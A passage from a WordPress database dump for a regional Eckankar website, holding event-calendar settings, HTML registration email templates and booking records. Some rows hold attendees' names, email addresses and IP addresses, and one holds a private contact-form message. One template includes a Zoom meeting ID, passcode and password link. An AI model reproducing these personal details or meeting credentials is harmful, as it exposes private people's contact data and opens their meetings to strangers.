src=\"https://eckankar-colorado.org/wp-content/uploads/2022/03/email-img-registration-597-bluframe-whitetext-9.png\" alt=\"\" width=\"604\" height=\"145\" /></td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 10px 20px 10px 20px; background-color: #f5f5f5; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\">\r\n<p style=\"margin: 0;\"><span style=\"color: #1d5791; font-size: 30px; font-family: arial, helvetica, sans-serif;\"><strong>Event Registration Confirmation</strong></span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px 10px 10px 10px; font-size: 0; background-color: #ffffff; border-bottom: 1px solid #f0f0f5; border-color: rgba(201,201,207,.35);\"><!-- [if mso]></p>\r\n<table role=\"presentation\" width=\"100%\">\r\n<tr>\r\n<td style=\"width:145px; padding: 15px 10px 11px 10px;\" align=\"left\" valign=\"top\">\r\n<p>                <![endif]-->\r\n<div class=\"col-lge\" style=\"display: inline-block; width: 100%; max-width: 500px; vertical-align: top; padding-bottom: 20px; font-family: Arial,sans-serif; font-size: 18px; line-height: 22px; color: #363636;\">\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 22px;\"><b>Hello %%first_name%% and thank you for registering!</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 20px;\">You are signed up for the following online event:</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\"><b><span style=\"color: #1d5791;\">Title: </span>%%event_title%%</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\"><b style=\"color: #1d5791;\">Date: </b>%%event_start_date%%</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\"><b style=\"color: #1d5791;\">Time: </b>%%event_start_time%%</p>\r\n<p style=\"margin-top: 0; margin-bottom: 15px;\"> </p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 22px; color: #1d5791;\"><b>Zoom Login Information:</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\"><b>Meeting ID: </b> 923 1691 4318<br />\r\n<b>Passcode:</b> 938668</p>\r\n<p style=\"margin-top: 0; margin-bottom: 20px;\"><a href=\"https://zoom.us/j/92316914318?pwd=VHFxMFJ3T3FhcSt6eUZlejZ6bXRaUT09\">https://zoom.us/j/92316914318?pwd=VHFxMFJ3T3FhcSt6eUZlejZ6bXRaUT09</a></p>\r\n<p style=\"margin-top: 0; margin-bottom: 20px;\"><b>Dial-in number: </b>720-707-2699 (for those who need to join by phone)</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">After you click the link, you will be prompted to either download the app to enter the meeting or enter through your browser. Please note that Zoom works best if you download the app. It is more stable and has more functions. Select use computer audio for sound.</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">Please join the meeting 5 - 10 minutes ahead of time to help us start on time. We look forward to seeing you at this online event.</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">See you there!</p>\r\n</div>\r\n<p><!-- [if mso]>\r\n                </td>\r\n</tr>\r\n</table>\r\n<p>                <![endif]--></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px; font-size: 16px; line-height: 28px; background-color: #efefef; border-bottom: 1px solid #f0f0f5; border-color: rgba(201,201,207,.35); text-align: center;\">You are receiving this email because you have submitted a request through the <a href=\"https://eckankar-colorado.org/\">Eckankar in Colorado</a> website. If you have any questions regarding the origin of this email, please feel free to get in touch, we\'re always happy to help out.</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 10px; background-color: #6e6e6e;\">\r\n<figure style=\"text-align: center;\"><span style=\"font-family: arial, helvetica, sans-serif;\"><img src=\"https://eckankar-colorado.org/wp-content/uploads/2021/05/fb-icon-email.png\" alt=\"f\" width=\"40\" height=\"40\" /> </span></figure>\r\n<figure style=\"text-align: center;\"><span style=\"font-size: 14px; line-height: 20px; color: #cccccc; margin: 0px; font-family: arial, helvetica, sans-serif;\">© Eckankar In Colorado -2022</span><br />\r\n<span style=\"font-family: arial, helvetica, sans-serif;\"><a title=\"Contact Us\" href=\"mailto:webmaster@eckankar-colorado.org\"><span style=\"font-size: 14px; line-height: 20px; text-decoration-line: underline; text-decoration-style: solid; text-decoration-color: currentcolor; text-decoration-thickness: auto; color: #cccccc; margin: 0px;\">Contact Us</span></a></span></figure>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p><!-- [if mso]>\r\n          </td>\r\n</tr>\r\n</table>\r\n<p>          <![endif]--></p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"1\";s:7:\"subject\";s:22:\"New Event Registration\";s:7:\"content\";s:9874:\"<!-- [if !mso]><!--><!--<![endif]--><!-- [if (gte mso 9)|(IE)]>\r\n\r\n      <xml>\r\n        <o:OfficeDocumentSettings>\r\n          <o:AllowPNG/>\r\n          <o:PixelsPerInch>96</o:PixelsPerInch>\r\n        </o:OfficeDocumentSettings>\r\n      </xml>\r\n      <![endif]--><!-- [if (gte mso 9)|(IE)]>\r\n  \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n<style type=\"text/css\">\r\n    body {width: 600px;margin: 0 auto;}\r\n    table {border-collapse: collapse;}\r\n    table, td {mso-table-lspace: 0pt;mso-table-rspace: 0pt;}\r\n    img {-ms-interpolation-mode: bicubic;}\r\n  </style>\r\n<![endif]-->\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\r\n<p>\r\n<style type=\"text/css\">\r\n    body, p, div {\r\n      font-family: inherit;\r\n      font-size: 14px;\r\n    }\r\n    body {\r\n      color: #000000;\r\n    }\r\n    body a {\r\n      color: #1188E6;\r\n      text-decoration: none;\r\n    }\r\n    p { margin: 0; padding: 0; }\r\n    table.wrapper {\r\n      width:100% !important;\r\n      table-layout: fixed;\r\n      -webkit-font-smoothing: antialiased;\r\n      -webkit-text-size-adjust: 100%;\r\n      -moz-text-size-adjust: 100%;\r\n      -ms-text-size-adjust: 100%;\r\n    }\r\n    img.max-width {\r\n      max-width: 100% !important;\r\n    }\r\n    .column.of-2 {\r\n      width: 50%;\r\n    }\r\n    .column.of-3 {\r\n      width: 33.333%;\r\n    }\r\n    .column.of-4 {\r\n      width: 25%;\r\n    }\r\n    ul ul ul ul  {\r\n      list-style-type: disc !important;\r\n    }\r\n    ol ol {\r\n      list-style-type: lower-roman !important;\r\n    }\r\n    ol ol ol {\r\n      list-style-type: lower-latin !important;\r\n    }\r\n    ol ol ol ol {\r\n      list-style-type: decimal !important;\r\n    }\r\n    @media screen and (max-width:480px) {\r\n      .preheader .rightColumnContent,\r\n      .footer .rightColumnContent {\r\n        text-align: left !important;\r\n      }\r\n      .preheader .rightColumnContent div,\r\n      .preheader .rightColumnContent span,\r\n      .footer .rightColumnContent div,\r\n      .footer .rightColumnContent span {\r\n        text-align: left !important;\r\n      }\r\n      .preheader .rightColumnContent,\r\n      .preheader .leftColumnContent {\r\n        font-size: 80% !important;\r\n        padding: 5px 0;\r\n      }\r\n      table.wrapper-mobile {\r\n        width: 100% !important;\r\n        table-layout: fixed;\r\n      }\r\n      img.max-width {\r\n        height: auto !important;\r\n        max-width: 100% !important;\r\n      }\r\n      a.bulletproof-button {\r\n        display: block !important;\r\n        width: auto !important;\r\n        font-size: 80%;\r\n        padding-left: 0 !important;\r\n        padding-right: 0 !important;\r\n      }\r\n      .columns {\r\n        width: 100% !important;\r\n      }\r\n      .column {\r\n        display: block !important;\r\n        width: 100% !important;\r\n        padding-left: 0 !important;\r\n        padding-right: 0 !important;\r\n        margin-left: 0 !important;\r\n        margin-right: 0 !important;\r\n      }\r\n      .social-icon-column {\r\n        display: inline-block !important;\r\n      }\r\n    }\r\n  </style>\r\n</p>\r\n<p>\r\n<style>\r\nbody {font-family: \'Muli\', sans-serif;}\r\n</style>\r\n</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<!--user entered Head Start--><!--End Head user entered--><center class=\"wrapper\" data-link-color=\"#1188E6\" data-body-style=\"font-size:14px; font-family:inherit; color:#000000; background-color:#FFFFFF;\">\r\n<div class=\"webkit\">\r\n<table class=\"wrapper\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" bgcolor=\"#FFFFFF\">\r\n<tbody>\r\n<tr>\r\n<td valign=\"top\" bgcolor=\"#FFFFFF\" width=\"100%\">\r\n<table class=\"outer\" role=\"content-container\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\">\r\n<tbody>\r\n<tr>\r\n<td width=\"100%\">\r\n<table border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td><!-- [if mso]>\r\n    <center>\r\n    \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n<table>\r\n<tr>\r\n<td width=\"600\">\r\n  <![endif]-->\r\n<table style=\"width: 100%; max-width: 600px;\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 0px 0px 0px 0px; color: #000000; text-align: left;\" role=\"modules-container\" align=\"left\" bgcolor=\"#FFFFFF\" width=\"100%\">\r\n<table class=\"module preheader preheader-hide\" style=\"display: none !important; mso-hide: all; visibility: hidden; opacity: 0; color: transparent; height: 0; width: 0;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"preheader\">\r\n<tbody>\r\n<tr>\r\n<td role=\"module-content\">\r\n<p>&nbsp;</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table style=\"padding: 30px 20px 30px 20px;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\" bgcolor=\"#f6f6f6\" data-type=\"columns\" data-distribution=\"1\">\r\n<tbody>\r\n<tr role=\"module-content\">\r\n<td valign=\"top\" height=\"100%\">\r\n<table class=\"column column-0\" style=\"width: 540px; border-spacing: 0; border-collapse: collapse; margin: 0px 10px 0px 10px;\" border=\"0\" width=\"540\" cellspacing=\"0\" cellpadding=\"0\" align=\"left\" bgcolor=\"\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 0px; margin: 0px; border-spacing: 0;\">\r\n<table class=\"module\" style=\"table-layout: fixed;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"text\" data-muid=\"6c9e9414-eb30-47e2-97d8-7bd6a4df5990\" data-mc-module-version=\"2019-10-22\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 18px 0px 10px 0px; line-height: 24px; text-align: inherit;\" role=\"module-content\" valign=\"top\" bgcolor=\"\" height=\"100%\">\r\n<div>\r\n<div style=\"font-family: inherit; text-align: center;\"><span style=\"color: #1d5791; font-family: arial, helvetica, sans-serif; font-size: 36px; text-decoration-line: underline; text-decoration-style: solid; text-decoration-color: currentcolor; text-decoration-thickness: auto;\">Admin Notification</span></div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table class=\"module\" style=\"table-layout: fixed;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"text\" data-muid=\"948e3f3f-5214-4721-a90e-625a47b1c957\" data-mc-module-version=\"2019-10-22\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 20px 30px 18px 30px; line-height: 26px; text-align: inherit; background-color: #efefef;\" role=\"module-content\" valign=\"top\" bgcolor=\"#efefef\" height=\"100%\">\r\n<div>\r\n<div style=\"font-family: inherit; text-align: center;\"><span style=\"color: #707172; font-size: 30px; font-family: arial, helvetica, sans-serif;\"><strong>New Event Registration</strong></span></div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table class=\"module\" style=\"table-layout: fixed;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"text\" data-muid=\"a10dcb57-ad22-4f4d-b765-1d427dfddb4e\" data-mc-module-version=\"2019-10-22\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 18px 30px 18px 30px; line-height: 22px; text-align: inherit; background-color: #ffffff;\" role=\"module-content\" valign=\"top\" bgcolor=\"#ffffff\" height=\"100%\">\r\n<div>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 20px; color: #333333;\"><strong>A new registration has been submitted for the following event:</strong></span></div>\r\n<p>&nbsp;</p>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>%%event_title%%</strong></span></div>\r\n<div></div>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>Date: </strong></span><span style=\"font-size: 19px; color: #333333;\"><strong>%%event_start_date%%</strong></span></div>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>Time: </strong></span><span style=\"font-size: 19px; color: #333333;\"><strong>%%event_start_time%%</strong></span> </div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table class=\"module\" style=\"table-layout: fixed;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"text\" data-muid=\"a4e5faa9-7044-47fd-a4a1-b7a1746c258e\" data-mc-module-version=\"2019-10-22\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 18px 0px 18px 5px; line-height: 22px; text-align: inherit; background-color: #efefef;\" role=\"module-content\" valign=\"top\" bgcolor=\"#efefef\" height=\"100%\">\r\n<div>\r\n<div style=\"font-family: inherit; text-align: center;\"><span style=\"font-size: 14pt;\">%%attendees_full_info%%</span> </div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table class=\"module\" style=\"table-layout: fixed;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"text\" data-muid=\"a265ebb9-ab9c-43e8-9009-54d6151b1600\" data-mc-module-version=\"2019-10-22\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 8px 30px 40px 28px; line-height: 22px; text-align: inherit; background-color: #6e6e6e;\" role=\"module-content\" valign=\"top\" bgcolor=\"#6e6e6e\" height=\"100%\">\r\n<div>\r\n<div style=\"font-family: inherit; text-align: center;\"></div>\r\n<figure style=\"text-align: center;\"><img src=\"https://eckankar-colorado.org/wp-content/uploads/2021/05/fb-icon-email.png\" alt=\"f\" width=\"40\" height=\"40\" /> </figure>\r\n<figure style=\"text-align: center;\"><span style=\"font-size: 14px; line-height: 20px; color: #cccccc; margin: 0px;\">© Eckankar In Colorado -2022</span></figure>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<!-- [if mso]>\r\n                                  </td>\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n                                </tr>\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n                              </table>\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n                            </center>\r\n                            <![endif]--></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n</center>\";}}'),(169743,267222,'mec_event_status','EventScheduled'),(169744,267222,'mec_moved_online_link',''),(169745,267222,'mec_cancelled_reason',''),(169746,267222,'mec_display_cancellation_reason_in_single_page',''),(169747,267222,'protect_children',''),(169748,267222,'passster_activate_global_protection',NULL),(169749,267222,'passster_activate_protection',NULL),(169750,267222,'passster_protection_type','password'),(169751,267222,'boldgrid_hide_page_title','0'),(169752,267222,'_thumbnail_id','266472'),(169753,267222,'_oembed_ace4d65561aa575fe8833c60d61f4161','{{unknown}}'),(169754,267222,'boldgrid_in_page_containers','1'),(169756,267222,'_dp_original','266522'),(169757,267222,'_edit_lock','1663187154:2'),(169758,267222,'_edit_last','2'),(169759,267223,'_wp_attached_file','2022/09/sunset-shell-1.jpg'),(169760,267223,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:705;s:6:\"height\";i:472;s:4:\"file\";s:26:\"2022/09/sunset-shell-1.jpg\";s:8:\"filesize\";i:52382;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:26:\"sunset-shell-1-300x201.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:201;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:10770;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:26:\"sunset-shell-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4751;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:26:\"sunset-shell-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14642;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:26:\"sunset-shell-1-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22891;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:26:\"sunset-shell-1-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16312;}s:8:\"tileview\";a:5:{s:4:\"file\";s:26:\"sunset-shell-1-300x400.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18344;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(193700,269204,'_form_id','61'),(193701,269204,'_seq_num','63'),(193683,269202,'_field_649',''),(193684,269202,'_form_id','61'),(193685,269202,'_seq_num','61'),(193686,269203,'_field_654','Gordon'),(169773,267226,'mec_cancellation_key','469d038c4c09e084eddf8da7fd6da993'),(169774,267226,'mec_confirmed','1'),(169775,267226,'mec_event_id','266604'),(169776,267226,'mec_date','1663501500:1663506000'),(169777,267226,'mec_ticket_id',',1,'),(169778,267226,'mec_booking_time','2022-09-18 08:07:39'),(169779,267226,'mec_all_dates','a:0:{}'),(169780,267226,'mec_other_dates','a:0:{}'),(169781,267226,'mec_attention_time','1663501500:1663506000'),(169782,267226,'mec_attention_time_start','1663501500'),(169783,267226,'mec_attention_time_end','1663506000'),(169784,267226,'mec_book_date_submit','20220918080739'),(169785,267226,'mec_booking_location','118'),(169786,267226,'mec_ticket_price_1','0'),(169787,267226,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:22:\"lindamaryk@hotmail.com\";s:4:\"name\";s:10:\"Linda Mary\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:14:\"68.114.225.164\";}}'),(169788,267226,'mec_price','0'),(169789,267226,'mec_gateway','MEC_gateway_free'),(169790,267226,'mec_gateway_label','Free'),(169791,267227,'mec_transaction_id','AYU51854'),(169792,267227,'mec_user_id','1000044'),(169793,267227,'mec_verified','1'),(169794,267227,'mec_verification_key','5d02b660438b972b1697522c2831a01a'),(169795,267227,'mec_cancellation_key','10484f4b5e92c216d36b504358d1e3cf'),(169796,267227,'mec_confirmed','1'),(169797,267227,'mec_event_id','266604'),(169798,267227,'mec_date','1663501500:1663506000'),(169799,267227,'mec_ticket_id',',1,'),(169800,267227,'mec_booking_time','2022-09-18 10:52:00'),(169801,267227,'mec_all_dates','a:0:{}'),(169802,267227,'mec_other_dates','a:0:{}'),(169803,267227,'mec_attention_time','1663501500:1663506000'),(169804,267227,'mec_attention_time_start','1663501500'),(169805,267227,'mec_attention_time_end','1663506000'),(169806,267227,'mec_book_date_submit','20220918105200'),(169807,267227,'mec_booking_location','118'),(169808,267227,'mec_ticket_price_1','0'),(169809,267227,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:26:\"colleynadanler@hotmail.com\";s:4:\"name\";s:15:\"Colleyna Danler\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:13:\"208.93.179.71\";}}'),(169810,267227,'mec_price','0'),(169811,267227,'mec_gateway','MEC_gateway_free'),(169812,267227,'mec_gateway_label','Free'),(169813,267228,'mec_transaction_id','EOH55126'),(169814,267228,'mec_user_id','1000014'),(169815,267228,'mec_verified','1'),(169816,267228,'mec_verification_key','1739a69eee969fdd7dd73b5eeb7bd8c9'),(169817,267228,'mec_cancellation_key','42229e956a18f4fc7bcd2ce26c904edf'),(169818,267228,'mec_confirmed','1'),(169819,267228,'mec_event_id','266604'),(169820,267228,'mec_date','1663501500:1663506000'),(169821,267228,'mec_ticket_id',',1,'),(169822,267228,'mec_booking_time','2022-09-18 12:15:21'),(169823,267228,'mec_all_dates','a:0:{}'),(169824,267228,'mec_other_dates','a:0:{}'),(169825,267228,'mec_attention_time','1663501500:1663506000'),(169826,267228,'mec_attention_time_start','1663501500'),(169827,267228,'mec_attention_time_end','1663506000'),(169828,267228,'mec_book_date_submit','20220918121522'),(169829,267228,'mec_booking_location','118'),(169830,267228,'mec_ticket_price_1','0'),(169831,267228,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:19:\"keanchico@yahoo.com\";s:4:\"name\";s:11:\"kery colvin\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:14:\"174.51.176.197\";}}'),(169832,267228,'mec_price','0'),(169833,267228,'mec_gateway','MEC_gateway_free'),(169834,267228,'mec_gateway_label','Free'),(169835,267229,'_field_133','Heinz'),(169836,267229,'_field_134','Panholzer'),(169837,267229,'_field_135','heinz@panholzer.com'),(169838,267229,'_field_137','Share a Hotel Room During World Wide Seminar'),(169839,267229,'_field_138','Dear Friend in ECK,\n\nI am a longterm ECKist from Austria.\nThis year I will come again to the World Wide Seminar and I would like to share a room with 1 or 2 ECKists.\nIf you know someone plase let me know.\nThank you!\n\nWith Love in ECK,\nHeinz Panholzer\n\nPS: I visited your Tempel in Denver several times in the recent years and enjoyed it indeed.'),(169840,267229,'_form_id','13'),(169841,267229,'_seq_num','117'),(169842,267230,'protect_children',''),(169843,267230,'mec_color',''),(169844,267230,'mec_location_id','122'),(169845,267230,'mec_dont_show_map','0'),(169846,267230,'mec_organizer_id','1'),(169847,267230,'mec_start_date','2022-10-02'),(169848,267230,'mec_start_time_hour','10'),(169849,267230,'mec_start_time_minutes','30'),(169850,267230,'mec_start_time_ampm','AM'),(169851,267230,'mec_start_day_seconds','37800'),(169852,267230,'mec_end_date','2022-10-02'),(169853,267230,'mec_end_time_hour','11'),(169854,267230,'mec_end_time_minutes','30'),(169855,267230,'mec_end_time_ampm','PM'),(169856,267230,'mec_end_day_seconds','84600'),(169857,267230,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2022-10-02\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2022-10-02\";s:4:\"hour\";s:2:\"11\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(169858,267230,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(169859,267230,'mec_certain_weekdays','a:0:{}'),(169860,267230,'mec_allday','0'),(169861,267230,'mec_hide_time','0'),(169862,267230,'mec_hide_end_time','0'),(169863,267230,'mec_comment',''),(169864,267230,'mec_repeat_status','0'),(169865,267230,'mec_repeat_type',''),(169866,267230,'mec_repeat_interval','1'),(169867,267230,'mec_repeat_end',''),(169868,267230,'mec_repeat_end_at_occurrences',''),(169869,267230,'mec_repeat_end_at_date',''),(169870,267230,'mec_advanced_days','a:0:{}'),(169871,267230,'mec_in_days',''),(169872,267230,'mec_not_in_days',''),(169873,267230,'mec_hourly_schedules','a:0:{}'),(169874,267230,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(169875,267230,'mec_tickets','a:0:{}'),(169876,267230,'mec_fees_global_inheritance','1'),(169877,267230,'mec_fees','a:0:{}'),(169878,267230,'mec_ticket_variations_global_inheritance','1'),(169879,267230,'mec_ticket_variations','a:0:{}'),(169880,267230,'mec_reg_fields_global_inheritance','1'),(169881,267230,'mec_reg_fields','a:0:{}'),(169882,267230,'mec_op','a:0:{}'),(169883,267230,'mec_event_date_submit','20210422105713'),(169884,267230,'mec_read_more',''),(169885,267230,'mec_more_info',''),(169886,267230,'mec_more_info_title',''),(169887,267230,'mec_more_info_target','_self'),(169888,267230,'mec_cost',''),(169889,267230,'mec_currency','a:0:{}'),(169890,267230,'mec_additional_organizer_ids','a:0:{}'),(169891,267230,'mec_additional_location_ids','a:0:{}'),(169892,267230,'one_occurrence','0'),(169893,267230,'mec_timezone','global'),(169894,267230,'mec_countdown_method','global'),(169895,267230,'mec_public','1'),(169896,267230,'mec_bfixed_fields','a:0:{}'),(169897,267230,'mec_fields','a:0:{}'),(169898,267230,'mec_event_status','EventScheduled'),(169899,267230,'mec_moved_online_link',''),(169900,267230,'mec_cancelled_reason',''),(169901,267230,'mec_display_cancellation_reason_in_single_page',''),(169902,267230,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as 